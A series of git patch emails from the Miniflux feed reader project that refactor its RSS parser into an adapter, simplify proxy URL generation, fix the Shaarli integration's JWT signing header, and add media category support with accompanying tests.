+ mac.Write([]byte(link))
+ digest := mac.Sum(nil)
+ return route.Path(router, "proxy", "encodedDigest", base64.URLEncoding.EncodeToString(digest), "encodedURL", base64.URLEncoding.EncodeToString([]byte(link)))
}
// AbsoluteProxifyURL generates an absolute URL for a proxified resource.
func AbsoluteProxifyURL(router *mux.Router, host, link string) string {
- if link != "" {
- proxyImageUrl := config.Opts.ProxyUrl()
+ proxifiedUrl := ProxifyURL(router, link)
- if proxyImageUrl == "" {
- mac := hmac.New(sha256.New, config.Opts.ProxyPrivateKey())
- mac.Write([]byte(link))
- digest := mac.Sum(nil)
- path := route.Path(router, "proxy", "encodedDigest", base64.URLEncoding.EncodeToString(digest), "encodedURL", base64.URLEncoding.EncodeToString([]byte(link)))
- if config.Opts.HTTPS {
- return "https://" + host + path
- } else {
- return "http://" + host + path
- }
- }
-
- proxyUrl, err := url.Parse(proxyImageUrl)
- if err != nil {
- return ""
- }
-
- proxyUrl.Path = path.Join(proxyUrl.Path, base64.URLEncoding.EncodeToString([]byte(link)))
- return proxyUrl.String()
+ if config.Opts.ProxyUrl() == "" {
+ return proxifiedUrl
}
- return ""
+ if config.Opts.HTTPS {
+ return "https://" + host + proxifiedUrl
+ }
+ return "http://" + host + proxifiedUrl
}
From 648b9a8f6f1e2aad032caed11df64f449ea157c1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Wed, 13 Mar 2024 21:06:28 -0700
Subject: [PATCH 10/80] Refactor RSS Parser to use an adapter
---
internal/reader/atom/atom_10.go | 2 +-
internal/reader/googleplay/googleplay.go | 2 +-
internal/reader/itunes/itunes.go | 4 +-
internal/reader/media/media.go | 11 +-
internal/reader/rdf/adapter.go | 5 +-
internal/reader/rss/adapter.go | 310 +++++++++++++++++
internal/reader/rss/feedburner.go | 4 +-
internal/reader/rss/parser.go | 6 +-
internal/reader/rss/parser_test.go | 107 ++++++
internal/reader/rss/podcast.go | 3 +-
internal/reader/rss/rss.go | 407 ++++-------------------
11 files changed, 497 insertions(+), 364 deletions(-)
create mode 100644 internal/reader/rss/adapter.go
diff --git a/internal/reader/atom/atom_10.go b/internal/reader/atom/atom_10.go
index 5b67e073..798a8748 100644
--- a/internal/reader/atom/atom_10.go
+++ b/internal/reader/atom/atom_10.go
@@ -91,7 +91,7 @@ type atom10Entry struct {
Content atom10Text `xml:"http://www.w3.org/2005/Atom content"`
Authors atomAuthors `xml:"author"`
Categories []atom10Category `xml:"category"`
- media.Element
+ media.MediaItemElement
}
func (a *atom10Entry) Transform() *model.Entry {
diff --git a/internal/reader/googleplay/googleplay.go b/internal/reader/googleplay/googleplay.go
index 38dcc71f..79404efb 100644
--- a/internal/reader/googleplay/googleplay.go
+++ b/internal/reader/googleplay/googleplay.go
@@ -6,7 +6,7 @@ package googleplay // import "miniflux.app/v2/internal/reader/googleplay"
// Specs:
// https://support.google.com/googleplay/podcasts/answer/6260341
// https://www.google.com/schemas/play-podcasts/1.0/play-podcasts.xsd
-type GooglePlayFeedElement struct {
+type GooglePlayChannelElement struct {
GooglePlayAuthor string `xml:"http://www.google.com/schemas/play-podcasts/1.0 author"`
GooglePlayEmail string `xml:"http://www.google.com/schemas/play-podcasts/1.0 email"`
GooglePlayImage GooglePlayImageElement `xml:"http://www.google.com/schemas/play-podcasts/1.0 image"`
diff --git a/internal/reader/itunes/itunes.go b/internal/reader/itunes/itunes.go
index 1673f306..87a02f0d 100644
--- a/internal/reader/itunes/itunes.go
+++ b/internal/reader/itunes/itunes.go
@@ -6,7 +6,7 @@ package itunes // import "miniflux.app/v2/internal/reader/itunes"
import "strings"
// Specs: https://help.apple.com/itc/podcasts_connect/#/itcb54353390
-type ItunesFeedElement struct {
+type ItunesChannelElement struct {
ItunesAuthor string `xml:"http://www.itunes.com/dtds/podcast-1.0.dtd author"`
ItunesBlock string `xml:"http://www.itunes.com/dtds/podcast-1.0.dtd block"`
ItunesCategories []ItunesCategoryElement `xml:"http://www.itunes.com/dtds/podcast-1.0.dtd category"`
@@ -22,7 +22,7 @@ type ItunesFeedElement struct {
ItunesType string `xml:"http://www.itunes.com/dtds/podcast-1.0.dtd type"`
}
-func (i *ItunesFeedElement) GetItunesCategories() []string {
+func (i *ItunesChannelElement) GetItunesCategories() []string {
var categories []string
for _, category := range i.ItunesCategories {
categories = append(categories, category.Text)
diff --git a/internal/reader/media/media.go b/internal/reader/media/media.go
index df84bf03..7fe4684d 100644
--- a/internal/reader/media/media.go
+++ b/internal/reader/media/media.go
@@ -11,9 +11,8 @@ import (
var textLinkRegex = regexp.MustCompile(`(?mi)(\bhttps?:\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])`)
-// Element represents XML media elements.
// Specs: https://www.rssboard.org/media-rss
-type Element struct {
+type MediaItemElement struct {
MediaGroups []Group `xml:"http://search.yahoo.com/mrss/ group"`
MediaContents []Content `xml:"http://search.yahoo.com/mrss/ content"`
MediaThumbnails []Thumbnail `xml:"http://search.yahoo.com/mrss/ thumbnail"`
@@ -22,7 +21,7 @@ type Element struct {
}
// AllMediaThumbnails returns all thumbnail elements merged together.
-func (e *Element) AllMediaThumbnails() []Thumbnail {
+func (e *MediaItemElement) AllMediaThumbnails() []Thumbnail {
var items []Thumbnail
items = append(items, e.MediaThumbnails...)
for _, mediaGroup := range e.MediaGroups {
@@ -32,7 +31,7 @@ func (e *Element) AllMediaThumbnails() []Thumbnail {
}
// AllMediaContents returns all content elements merged together.
-func (e *Element) AllMediaContents() []Content {
+func (e *MediaItemElement) AllMediaContents() []Content {
var items []Content
items = append(items, e.MediaContents...)
for _, mediaGroup := range e.MediaGroups {
@@ -42,7 +41,7 @@ func (e *Element) AllMediaContents() []Content {
}
// AllMediaPeerLinks returns all peer link elements merged together.
-func (e *Element) AllMediaPeerLinks() []PeerLink {
+func (e *MediaItemElement) AllMediaPeerLinks() []PeerLink {
var items []PeerLink
items = append(items, e.MediaPeerLinks...)
for _, mediaGroup := range e.MediaGroups {
@@ -52,7 +51,7 @@ func (e *Element) AllMediaPeerLinks() []PeerLink {
}
// FirstMediaDescription returns the first description element.
-func (e *Element) FirstMediaDescription() string {
+func (e *MediaItemElement) FirstMediaDescription() string {
description := e.MediaDescriptions.First()
if description != "" {
return description
diff --git a/internal/reader/rdf/adapter.go b/internal/reader/rdf/adapter.go
index 812badbc..bc8c76ed 100644
--- a/internal/reader/rdf/adapter.go
+++ b/internal/reader/rdf/adapter.go
@@ -28,15 +28,14 @@ func (r *RDFAdapter) BuildFeed(feedURL string) *model.Feed {
feed := &model.Feed{
Title: stripTags(r.rdf.Channel.Title),
FeedURL: feedURL,
+ SiteURL: r.rdf.Channel.Link,
}
if feed.Title == "" {
feed.Title = feedURL
}
- if siteURL, err := urllib.AbsoluteURL(feedURL, r.rdf.Channel.Link); err != nil {
- feed.SiteURL = r.rdf.Channel.Link
- } else {
+ if siteURL, err := urllib.AbsoluteURL(feedURL, r.rdf.Channel.Link); err == nil {
feed.SiteURL = siteURL
}
diff --git a/internal/reader/rss/adapter.go b/internal/reader/rss/adapter.go
new file mode 100644
index 00000000..5c1785a9
--- /dev/null
+++ b/internal/reader/rss/adapter.go
@@ -0,0 +1,310 @@
+// SPDX-FileCopyrightText: Copyright The Miniflux Authors. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+package rss // import "miniflux.app/v2/internal/reader/rss"
+
+import (
+ "html"
+ "log/slog"
+ "path"
+ "strconv"
+ "strings"
+ "time"
+
+ "miniflux.app/v2/internal/crypto"
+ "miniflux.app/v2/internal/model"
+ "miniflux.app/v2/internal/reader/date"
+ "miniflux.app/v2/internal/reader/sanitizer"
+ "miniflux.app/v2/internal/urllib"
+)
+
+type RSSAdapter struct {
+ rss *RSS
+}
+
+func NewRSSAdapter(rss *RSS) *RSSAdapter {
+ return &RSSAdapter{rss}
+}
+
+func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
+ feed := &model.Feed{
+ Title: html.UnescapeString(strings.TrimSpace(r.rss.Channel.Title)),
+ FeedURL: feedURL,
+ SiteURL: r.rss.Channel.Link,
+ }
+
+ if siteURL, err := urllib.AbsoluteURL(feedURL, r.rss.Channel.Link); err == nil {
+ feed.SiteURL = siteURL
+ }
+
+ // Try to find the feed URL from the Atom links.
+ for _, atomLink := range r.rss.Channel.AtomLinks.Links {
+ atomLinkHref := strings.TrimSpace(atomLink.URL)
+ if atomLinkHref != "" && atomLink.Rel == "self" {
+ if absoluteFeedURL, err := urllib.AbsoluteURL(feedURL, atomLinkHref); err == nil {
+ feed.FeedURL = absoluteFeedURL
+ break
+ }
+ }
+ }
+
+ // Fallback to the site URL if the title is empty.
+ if feed.Title == "" {
+ feed.Title = feed.SiteURL
+ }
+
+ // Get TTL if defined.
+ if r.rss.Channel.TTL != "" {
+ if ttl, err := strconv.Atoi(r.rss.Channel.TTL); err == nil {
+ feed.TTL = ttl
+ }
+ }
+
+ // Get the feed icon URL if defined.
+ if r.rss.Channel.Image != nil {
+ if absoluteIconURL, err := urllib.AbsoluteURL(feed.SiteURL, r.rss.Channel.Image.URL); err == nil {
+ feed.IconURL = absoluteIconURL
+ }
+ }
+
+ for _, item := range r.rss.Channel.Items {
+ entry := model.NewEntry()
+ entry.Author = findEntryAuthor(&item)
+ entry.Date = findEntryDate(&item)
+ entry.Content = findEntryContent(&item)
+ entry.Enclosures = findEntryEnclosures(&item)
+
+ // Populate the entry URL.
+ entryURL := findEntryURL(&item)
+ if entryURL == "" {
+ entry.URL = feed.SiteURL
+ } else {
+ if absoluteEntryURL, err := urllib.AbsoluteURL(feed.SiteURL, entryURL); err == nil {
+ entry.URL = absoluteEntryURL
+ } else {
+ entry.URL = entryURL
+ }
+ }
+
+ // Populate the entry title.
+ entry.Title = findEntryTitle(&item)
+ if entry.Title == "" {
+ entry.Title = sanitizer.TruncateHTML(entry.Content, 100)
+ }
+
+ if entry.Title == "" {
+ entry.Title = entry.URL
+ }
+
+ if entry.Author == "" {
+ entry.Author = findFeedAuthor(&r.rss.Channel)
+ }
+
+ // Generate the entry hash.
+ for _, value := range []string{item.GUID.Data, entryURL} {
+ if value != "" {
+ entry.Hash = crypto.Hash(value)
+ break
+ }
+ }
+
+ // Find CommentsURL if defined.
+ if absoluteCommentsURL := strings.TrimSpace(item.CommentsURL); absoluteCommentsURL != "" && urllib.IsAbsoluteURL(absoluteCommentsURL) {
+ entry.CommentsURL = absoluteCommentsURL
+ }
+
+ // Set podcast listening time.
+ if item.ItunesDuration != "" {
+ if duration, err := getDurationInMinutes(item.ItunesDuration); err == nil {
+ entry.ReadingTime = duration
+ }
+ }
+
+ // Populate entry categories.
+ entry.Tags = append(entry.Tags, item.Categories...)
+ entry.Tags = append(entry.Tags, r.rss.Channel.Categories...)
+ entry.Tags = append(entry.Tags, r.rss.Channel.GetItunesCategories()...)
+
+ if r.rss.Channel.GooglePlayCategory.Text != "" {
+ entry.Tags = append(entry.Tags, r.rss.Channel.GooglePlayCategory.Text)
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
+
+func findFeedAuthor(rssChannel *RSSChannel) string {
+ var author string
+ switch {
+ case rssChannel.ItunesAuthor != "":
+ author = rssChannel.ItunesAuthor
+ case rssChannel.GooglePlayAuthor != "":
+ author = rssChannel.GooglePlayAuthor
+ case rssChannel.ItunesOwner.String() != "":
+ author = rssChannel.ItunesOwner.String()
+ case rssChannel.ManagingEditor != "":
+ author = rssChannel.ManagingEditor
+ case rssChannel.Webmaster != "":
+ author = rssChannel.Webmaster
+ }
+ return sanitizer.StripTags(strings.TrimSpace(author))
+}
+
+func findEntryTitle(rssItem *RSSItem) string {
+ title := rssItem.Title
+
+ if rssItem.DublinCoreTitle != "" {
+ title = rssItem.DublinCoreTitle
+ }
+
+ return html.UnescapeString(strings.TrimSpace(title))
+}
+
+func findEntryURL(rssItem *RSSItem) string {
+ for _, link := range []string{rssItem.FeedBurnerLink, rssItem.Link} {
+ if link != "" {
+ return strings.TrimSpace(link)
+ }
+ }
+
+ for _, atomLink := range rssItem.AtomLinks.Links {
+ if atomLink.URL != "" && (strings.EqualFold(atomLink.Rel, "alternate") || atomLink.Rel == "") {
+ return strings.TrimSpace(atomLink.URL)
+ }
+ }
+
+ // Specs: https://cyber.harvard.edu/rss/rss.html#ltguidgtSubelementOfLtitemgt
+ // isPermaLink is optional, its default value is true.
+ // If its value is false, the guid may not be assumed to be a url, or a url to anything in particular.
+ if rssItem.GUID.IsPermaLink == "true" || rssItem.GUID.IsPermaLink == "" {
+ return strings.TrimSpace(rssItem.GUID.Data)
+ }
+
+ return ""
+}
+
+func findEntryContent(rssItem *RSSItem) string {
+ for _, value := range []string{
+ rssItem.DublinCoreContent,
+ rssItem.Description,
+ rssItem.GooglePlayDescription,
+ rssItem.ItunesSummary,
+ rssItem.ItunesSubtitle,
+ } {
+ if value != "" {
+ return value
+ }
+ }
+ return ""
+}
+
+func findEntryDate(rssItem *RSSItem) time.Time {
+ value := rssItem.PubDate
+ if rssItem.DublinCoreDate != "" {
+ value = rssItem.DublinCoreDate
+ }
+
+ if value != "" {
+ result, err := date.Parse(value)
+ if err != nil {
+ slog.Debug("Unable to parse date from RSS feed",
+ slog.String("date", value),
+ slog.String("guid", rssItem.GUID.Data),
+ slog.Any("error", err),
+ )
+ return time.Now()
+ }
+
+ return result
+ }
+
+ return time.Now()
+}
+
+func findEntryAuthor(rssItem *RSSItem) string {
+ var author string
+
+ switch {
+ case rssItem.GooglePlayAuthor != "":
+ author = rssItem.GooglePlayAuthor
+ case rssItem.ItunesAuthor != "":
+ author = rssItem.ItunesAuthor
+ case rssItem.DublinCoreCreator != "":
+ author = rssItem.DublinCoreCreator
+ case rssItem.AtomAuthor.String() != "":
+ author = rssItem.AtomAuthor.String()
+ case strings.Contains(rssItem.Author.Inner, "
+
+
+ My Podcast Feed
+ http://example.org
+ some.email@example.org
+
+ Podcasting with RSS
+ http://www.example.org/entries/1
+ An overview of RSS podcasting
+ Fri, 15 Jul 2005 00:00:00 -0500
+ http://www.example.org/entries/1
+
+
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Errorf("Incorrect number of entries, got: %d", len(feed.Entries))
+ }
+
+ if feed.Entries[0].URL != "http://www.example.org/entries/1" {
+ t.Errorf("Incorrect entry URL, got: %s", feed.Entries[0].URL)
+ }
+
+ if len(feed.Entries[0].Enclosures) != 2 {
+ t.Errorf("Incorrect number of enclosures, got: %d", len(feed.Entries[0].Enclosures))
+ }
+
+ if feed.Entries[0].Enclosures[0].URL != "http://www.example.org/myaudiofile.mp3" {
+ t.Errorf("Incorrect enclosure URL, got: %s", feed.Entries[0].Enclosures[0].URL)
+ }
+
+ if feed.Entries[0].Enclosures[0].MimeType != "audio/mpeg" {
+ t.Errorf("Incorrect enclosure type, got: %s", feed.Entries[0].Enclosures[0].MimeType)
+ }
+
+ if feed.Entries[0].Enclosures[0].Size != 0 {
+ t.Errorf("Incorrect enclosure length, got: %d", feed.Entries[0].Enclosures[0].Size)
+ }
+
+ if feed.Entries[0].Enclosures[1].Size != 0 {
+ t.Errorf("Incorrect enclosure length, got: %d", feed.Entries[0].Enclosures[0].Size)
+ }
+}
+
func TestParseEntryWithEmptyEnclosureURL(t *testing.T) {
data := `
@@ -1306,6 +1359,60 @@ func TestParseEntryWithMediaPeerLink(t *testing.T) {
}
}
+func TestParseItunesDuration(t *testing.T) {
+ data := `
+
+
+ Podcast Example
+ http://www.example.com/index.html
+
+ Podcast Episode
+ http://example.com/episode.m4a
+ Tue, 08 Mar 2016 12:00:00 GMT
+ 1:23:45
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ expected := 83
+ result := feed.Entries[0].ReadingTime
+ if expected != result {
+ t.Errorf(`Unexpected podcast duration, got %d instead of %d`, result, expected)
+ }
+}
+
+func TestParseIncorrectItunesDuration(t *testing.T) {
+ data := `
+
+
+ Podcast Example
+ http://www.example.com/index.html
+
+ Podcast Episode
+ http://example.com/episode.m4a
+ Tue, 08 Mar 2016 12:00:00 GMT
+ invalid
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ expected := 0
+ result := feed.Entries[0].ReadingTime
+ if expected != result {
+ t.Errorf(`Unexpected podcast duration, got %d instead of %d`, result, expected)
+ }
+}
+
func TestEntryDescriptionFromItunesSummary(t *testing.T) {
data := `
diff --git a/internal/reader/rss/podcast.go b/internal/reader/rss/podcast.go
index 9a1f365b..7fd93f4a 100644
--- a/internal/reader/rss/podcast.go
+++ b/internal/reader/rss/podcast.go
@@ -12,8 +12,7 @@ import (
var ErrInvalidDurationFormat = errors.New("rss: invalid duration format")
-// normalizeDuration returns the duration tag value as a number of minutes
-func normalizeDuration(rawDuration string) (int, error) {
+func getDurationInMinutes(rawDuration string) (int, error) {
var sumSeconds int
durationParts := strings.Split(rawDuration, ":")
diff --git a/internal/reader/rss/rss.go b/internal/reader/rss/rss.go
index be53c4b0..7935166d 100644
--- a/internal/reader/rss/rss.go
+++ b/internal/reader/rss/rss.go
@@ -5,391 +5,110 @@ package rss // import "miniflux.app/v2/internal/reader/rss"
import (
"encoding/xml"
- "html"
- "log/slog"
- "path"
"strconv"
"strings"
- "time"
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
"miniflux.app/v2/internal/reader/dublincore"
"miniflux.app/v2/internal/reader/googleplay"
"miniflux.app/v2/internal/reader/itunes"
"miniflux.app/v2/internal/reader/media"
- "miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
)
// Specs: https://www.rssboard.org/rss-specification
-type rssFeed struct {
- XMLName xml.Name `xml:"rss"`
+type RSS struct {
Version string `xml:"rss version,attr"`
- Channel rssChannel `xml:"rss channel"`
+ Channel RSSChannel `xml:"rss channel"`
}
-type rssChannel struct {
- Categories []string `xml:"rss category"`
+type RSSChannel struct {
Title string `xml:"rss title"`
Link string `xml:"rss link"`
- ImageURL string `xml:"rss image>url"`
- Language string `xml:"rss language"`
Description string `xml:"rss description"`
- PubDate string `xml:"rss pubDate"`
+ Language string `xml:"rss language"`
+ Copyright string `xml:"rss copyRight"`
ManagingEditor string `xml:"rss managingEditor"`
Webmaster string `xml:"rss webMaster"`
- TimeToLive rssTTL `xml:"rss ttl"`
- Items []rssItem `xml:"rss item"`
+ PubDate string `xml:"rss pubDate"`
+ LastBuildDate string `xml:"rss lastBuildDate"`
+ Categories []string `xml:"rss category"`
+ Generator string `xml:"rss generator"`
+ Docs string `xml:"rss docs"`
+ Cloud *RSSCloud `xml:"rss cloud"`
+ Image *RSSImage `xml:"rss image"`
+ TTL string `xml:"rss ttl"`
+ SkipHours []string `xml:"rss skipHours>hour"`
+ SkipDays []string `xml:"rss skipDays>day"`
+ Items []RSSItem `xml:"rss item"`
AtomLinks
- itunes.ItunesFeedElement
- googleplay.GooglePlayFeedElement
+ itunes.ItunesChannelElement
+ googleplay.GooglePlayChannelElement
}
-type rssTTL struct {
- Data string `xml:",chardata"`
+type RSSCloud struct {
+ Domain string `xml:"domain,attr"`
+ Port string `xml:"port,attr"`
+ Path string `xml:"path,attr"`
+ RegisterProcedure string `xml:"registerProcedure,attr"`
+ Protocol string `xml:"protocol,attr"`
}
-func (r *rssTTL) Value() int {
- if r.Data == "" {
- return 0
- }
+type RSSImage struct {
+ // URL is the URL of a GIF, JPEG or PNG image that represents the channel.
+ URL string `xml:"url"`
- value, err := strconv.Atoi(r.Data)
- if err != nil {
- return 0
- }
+ // Title describes the image, it's used in the ALT attribute of the HTML tag when the channel is rendered in HTML.
+ Title string `xml:"title"`
- return value
+ // Link is the URL of the site, when the channel is rendered, the image is a link to the site.
+ Link string `xml:"link"`
}
-func (r *rssFeed) Transform(baseURL string) *model.Feed {
- var err error
-
- feed := new(model.Feed)
-
- siteURL := r.siteURL()
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, siteURL)
- if err != nil {
- feed.SiteURL = siteURL
- }
-
- feedURL := r.feedURL()
- feed.FeedURL, err = urllib.AbsoluteURL(baseURL, feedURL)
- if err != nil {
- feed.FeedURL = feedURL
- }
-
- feed.Title = html.UnescapeString(strings.TrimSpace(r.Channel.Title))
- if feed.Title == "" {
- feed.Title = feed.SiteURL
- }
-
- feed.IconURL = strings.TrimSpace(r.Channel.ImageURL)
- feed.TTL = r.Channel.TimeToLive.Value()
-
- for _, item := range r.Channel.Items {
- entry := item.Transform()
- if entry.Author == "" {
- entry.Author = r.feedAuthor()
- }
-
- if entry.URL == "" {
- entry.URL = feed.SiteURL
- } else {
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL)
- if err == nil {
- entry.URL = entryURL
- }
- }
-
- if entry.Title == "" {
- entry.Title = sanitizer.TruncateHTML(entry.Content, 100)
- }
-
- if entry.Title == "" {
- entry.Title = entry.URL
- }
-
- entry.Tags = append(entry.Tags, r.Channel.Categories...)
- entry.Tags = append(entry.Tags, r.Channel.GetItunesCategories()...)
-
- if r.Channel.GooglePlayCategory.Text != "" {
- entry.Tags = append(entry.Tags, r.Channel.GooglePlayCategory.Text)
- }
-
- feed.Entries = append(feed.Entries, entry)
- }
-
- return feed
-}
-
-func (r *rssFeed) siteURL() string {
- return strings.TrimSpace(r.Channel.Link)
-}
-
-func (r *rssFeed) feedURL() string {
- for _, atomLink := range r.Channel.AtomLinks.Links {
- if atomLink.Rel == "self" {
- return strings.TrimSpace(atomLink.URL)
- }
- }
- return ""
-}
-
-func (r rssFeed) feedAuthor() string {
- var author string
- switch {
- case r.Channel.ItunesAuthor != "":
- author = r.Channel.ItunesAuthor
- case r.Channel.GooglePlayAuthor != "":
- author = r.Channel.GooglePlayAuthor
- case r.Channel.ItunesOwner.String() != "":
- author = r.Channel.ItunesOwner.String()
- case r.Channel.ManagingEditor != "":
- author = r.Channel.ManagingEditor
- case r.Channel.Webmaster != "":
- author = r.Channel.Webmaster
- }
- return sanitizer.StripTags(strings.TrimSpace(author))
-}
-
-type rssGUID struct {
- XMLName xml.Name
- Data string `xml:",chardata"`
- IsPermaLink string `xml:"isPermaLink,attr"`
-}
-
-type rssAuthor struct {
- XMLName xml.Name
- Data string `xml:",chardata"`
- Inner string `xml:",innerxml"`
-}
-
-type rssEnclosure struct {
- URL string `xml:"url,attr"`
- Type string `xml:"type,attr"`
- Length string `xml:"length,attr"`
-}
-
-func (enclosure *rssEnclosure) Size() int64 {
- if enclosure.Length == "" {
- return 0
- }
- size, _ := strconv.ParseInt(enclosure.Length, 10, 0)
- return size
-}
-
-type rssItem struct {
- GUID rssGUID `xml:"rss guid"`
- Title string `xml:"rss title"`
- Link string `xml:"rss link"`
- Description string `xml:"rss description"`
- PubDate string `xml:"rss pubDate"`
- Author rssAuthor `xml:"rss author"`
- Comments string `xml:"rss comments"`
- EnclosureLinks []rssEnclosure `xml:"rss enclosure"`
- Categories []string `xml:"rss category"`
+type RSSItem struct {
+ Title string `xml:"rss title"`
+ Link string `xml:"rss link"`
+ Description string `xml:"rss description"`
+ Author RSSAuthor `xml:"rss author"`
+ Categories []string `xml:"rss category"`
+ CommentsURL string `xml:"rss comments"`
+ Enclosures []RSSEnclosure `xml:"rss enclosure"`
+ GUID RSSGUID `xml:"rss guid"`
+ PubDate string `xml:"rss pubDate"`
+ Source RSSSource `xml:"rss source"`
dublincore.DublinCoreItemElement
- FeedBurnerElement
- media.Element
+ FeedBurnerItemElement
+ media.MediaItemElement
AtomAuthor
AtomLinks
itunes.ItunesItemElement
googleplay.GooglePlayItemElement
}
-func (r *rssItem) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.URL = r.entryURL()
- entry.CommentsURL = r.entryCommentsURL()
- entry.Date = r.entryDate()
- entry.Author = r.entryAuthor()
- entry.Hash = r.entryHash()
- entry.Content = r.entryContent()
- entry.Title = r.entryTitle()
- entry.Enclosures = r.entryEnclosures()
- entry.Tags = r.Categories
- if duration, err := normalizeDuration(r.ItunesDuration); err == nil {
- entry.ReadingTime = duration
- }
-
- return entry
+type RSSAuthor struct {
+ XMLName xml.Name
+ Data string `xml:",chardata"`
+ Inner string `xml:",innerxml"`
}
-func (r *rssItem) entryDate() time.Time {
- value := r.PubDate
- if r.DublinCoreDate != "" {
- value = r.DublinCoreDate
- }
-
- if value != "" {
- result, err := date.Parse(value)
- if err != nil {
- slog.Debug("Unable to parse date from RSS feed",
- slog.String("date", value),
- slog.String("guid", r.GUID.Data),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return result
- }
-
- return time.Now()
+type RSSEnclosure struct {
+ URL string `xml:"url,attr"`
+ Type string `xml:"type,attr"`
+ Length string `xml:"length,attr"`
}
-func (r *rssItem) entryAuthor() string {
- var author string
-
- switch {
- case r.GooglePlayAuthor != "":
- author = r.GooglePlayAuthor
- case r.ItunesAuthor != "":
- author = r.ItunesAuthor
- case r.DublinCoreCreator != "":
- author = r.DublinCoreCreator
- case r.AtomAuthor.String() != "":
- author = r.AtomAuthor.String()
- case strings.Contains(r.Author.Inner, "
Date: Wed, 13 Mar 2024 23:29:07 +0100
Subject: [PATCH 11/80] Fix and simplify shaarli's integration
- The jwt token was declared as using HS256 as algorithm, but was using HS512.
- No need to base64-encode then remove the padding when we can simply encode
without padding.
- Factorize the header+payload concatenation as data
Odds are that this integration was broken from the start (HS512 vs HS256), so
I'm not sure if it's better to add tests or to simply get rid of it.
---
internal/integration/shaarli/shaarli.go | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/internal/integration/shaarli/shaarli.go b/internal/integration/shaarli/shaarli.go
index a69da227..aeb701e8 100644
--- a/internal/integration/shaarli/shaarli.go
+++ b/internal/integration/shaarli/shaarli.go
@@ -11,7 +11,6 @@ import (
"encoding/json"
"fmt"
"net/http"
- "strings"
"time"
"miniflux.app/v2/internal/urllib"
@@ -74,14 +73,15 @@ func (c *Client) CreateLink(entryURL, entryTitle string) error {
}
func (c *Client) generateBearerToken() string {
- header := strings.TrimRight(base64.URLEncoding.EncodeToString([]byte(`{"typ":"JWT", "alg":"HS256"}`)), "=")
- payload := strings.TrimRight(base64.URLEncoding.EncodeToString([]byte(fmt.Sprintf(`{"iat": %d}`, time.Now().Unix()))), "=")
+ header := base64.RawURLEncoding.EncodeToString([]byte(`{"typ":"JWT","alg":"HS512"}`))
+ payload := base64.RawURLEncoding.EncodeToString([]byte(fmt.Sprintf(`{"iat":%d}`, time.Now().Unix())))
+ data := header + "." + payload
mac := hmac.New(sha512.New, []byte(c.apiSecret))
- mac.Write([]byte(header + "." + payload))
- signature := strings.TrimRight(base64.URLEncoding.EncodeToString(mac.Sum(nil)), "=")
+ mac.Write([]byte(data))
+ signature := base64.RawURLEncoding.EncodeToString(mac.Sum(nil))
- return header + "." + payload + "." + signature
+ return data + "." + signature
}
type addLinkRequest struct {
From 5948786b158f5c16bc2cd05d2e238546b93f5b48 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Wed, 13 Mar 2024 21:26:39 -0700
Subject: [PATCH 12/80] Add support for RSS element
---
internal/reader/media/media.go | 28 ++++++++++++++++++-----
internal/reader/rss/adapter.go | 1 +
internal/reader/rss/parser_test.go | 36 ++++++++++++++++++++++++++++++
3 files changed, 60 insertions(+), 5 deletions(-)
diff --git a/internal/reader/media/media.go b/internal/reader/media/media.go
index 7fe4684d..a4b7d8af 100644
--- a/internal/reader/media/media.go
+++ b/internal/reader/media/media.go
@@ -13,11 +13,12 @@ var textLinkRegex = regexp.MustCompile(`(?mi)(\bhttps?:\/\/[-A-Z0-9+&@#\/%?=~_|!
// Specs: https://www.rssboard.org/media-rss
type MediaItemElement struct {
- MediaGroups []Group `xml:"http://search.yahoo.com/mrss/ group"`
- MediaContents []Content `xml:"http://search.yahoo.com/mrss/ content"`
- MediaThumbnails []Thumbnail `xml:"http://search.yahoo.com/mrss/ thumbnail"`
- MediaDescriptions DescriptionList `xml:"http://search.yahoo.com/mrss/ description"`
- MediaPeerLinks []PeerLink `xml:"http://search.yahoo.com/mrss/ peerLink"`
+ MediaCategories MediaCategoryList `xml:"http://search.yahoo.com/mrss/ category"`
+ MediaGroups []Group `xml:"http://search.yahoo.com/mrss/ group"`
+ MediaContents []Content `xml:"http://search.yahoo.com/mrss/ content"`
+ MediaThumbnails []Thumbnail `xml:"http://search.yahoo.com/mrss/ thumbnail"`
+ MediaDescriptions DescriptionList `xml:"http://search.yahoo.com/mrss/ description"`
+ MediaPeerLinks []PeerLink `xml:"http://search.yahoo.com/mrss/ peerLink"`
}
// AllMediaThumbnails returns all thumbnail elements merged together.
@@ -173,3 +174,20 @@ func (dl DescriptionList) First() string {
}
return ""
}
+
+type MediaCategoryList []MediaCategory
+
+func (mcl MediaCategoryList) Labels() []string {
+ var labels []string
+ for _, category := range mcl {
+ label := strings.TrimSpace(category.Label)
+ if label != "" {
+ labels = append(labels, label)
+ }
+ }
+ return labels
+}
+
+type MediaCategory struct {
+ Label string `xml:"label,attr"`
+}
diff --git a/internal/reader/rss/adapter.go b/internal/reader/rss/adapter.go
index 5c1785a9..fe1eed80 100644
--- a/internal/reader/rss/adapter.go
+++ b/internal/reader/rss/adapter.go
@@ -122,6 +122,7 @@ func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
// Populate entry categories.
